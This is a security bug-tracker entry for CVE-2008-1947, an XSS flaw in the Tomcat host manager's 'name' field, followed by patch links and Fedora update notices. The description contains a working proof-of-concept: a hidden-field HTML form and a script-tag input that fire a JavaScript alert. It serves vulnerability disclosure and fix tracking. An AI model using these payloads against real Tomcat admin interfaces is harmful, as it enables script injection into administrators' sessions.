Bug 446393 (CVE-2008-1947)

Summary: CVE-2008-1947 Tomcat host manager xss - name field
Product: [Other] Security Response Reporter: Petr Šplíchal <psplicha>
Component: vulnerabilityAssignee: David Walluck <dwalluck>
Status: CLOSED ERRATA QA Contact:
Severity: low Docs Contact:
Priority: low    
Version: unspecifiedCC: devrim, dwalluck, kreilly, ohudlick, rafaels, security-response-team
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2010-05-10 15:33:36 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 449916, 449917, 458088, 458089, 458097, 458444, 458445, 460125, 460126, 460127, 460131, 460132    
Bug Blocks:    

Description Petr Šplíchal 2008-05-14 13:33:44 UTC
Similarly as "alias" field in bug 247994 tomcat's host manager web interface
suffers from javascript exploit in the "name" field:

  Assume that after logged in, the victim was lead to the malicious web
  server with following file installed.
  <form action="http://localhost:8080/host-manager/html/add" method="get">
     <INPUT TYPE="hidden" NAME='name' VALUE="<script>alert()</script>">
     <INPUT TYPE="hidden" NAME='aliases' VALUE="somealias">
     <input type="submit">
  </form>

Steps to reproduce:

* install tomcat5 tomcat5-admin-webapps.
* edit /etc/tomcat5/tomcat-users.xml and add
   <role rolename="tomcat"/> 
   <user username="tomcat" password="tomcat" roles="tomcat,admin"/>
* restart tomcat5
* Visit http://localhost:8080/host-manager/html/add
* login with user name tomcat and password tomcat
* Enter the following:
      name: <script>alert("name-exploit!")</script>
      alias: somealias
* hit add.
* You should see the javascript alert box popping up.

Comment 1 Marc Schoenefeld 2008-06-04 08:50:20 UTC
Public patch available here:   
http://svn.apache.org/viewvc?view=rev&revision=662582

Comment 3 Tomas Hoger 2008-06-05 06:48:30 UTC
Public now via:

  http://marc.info/?l=tomcat-user&m=121244319501278&w=2
  http://tomcat.apache.org/security-5.html
  http://tomcat.apache.org/security-6.html

Will be fixed upstream in the upcoming 5.5.27 and 6.0.17.

Comment 11 Fedora Update System 2008-09-05 17:10:46 UTC
tomcat6-6.0.18-1.1.fc9 has been submitted as an update for Fedora 9.
http://admin.fedoraproject.org/updates/tomcat6-6.0.18-1.1.fc9

Comment 12 Fedora Update System 2008-09-11 17:17:13 UTC
tomcat6-6.0.18-1.1.fc9 has been pushed to the Fedora 9 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 13 Fedora Update System 2008-09-15 18:12:15 UTC
tomcat5-5.5.27-0jpp.1.fc8 has been submitted as an update for Fedora 8.
http://admin.fedoraproject.org/updates/tomcat5-5.5.27-0jpp.1.fc8

Comment 14 Fedora Update System 2008-09-15 20:13:52 UTC
tomcat5-5.5.27-0jpp.2.fc9 has been submitted as an update for Fedora 9.
http://admin.fedoraproject.org/updates/tomcat5-5.5.27-0jpp.2.fc9

Comment 15 Fedora Update System 2008-09-15 20:16:24 UTC
tomcat5-5.5.27-0jpp.2.fc8 has been submitted as an update for Fedora 8.
http://admin.fedoraproject.org/updates/tomcat5-5.5.27-0jpp.2.fc8

Comment 16 Fedora Update System 2008-09-16 23:24:54 UTC
tomcat5-5.5.27-0jpp.2.fc9 has been pushed to the Fedora 9 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 17 Fedora Update System 2008-09-16 23:28:21 UTC
tomcat5-5.5.27-0jpp.2.fc8 has been pushed to the Fedora 8 stable repository.  If problems still persist, please make note of it in this bug report.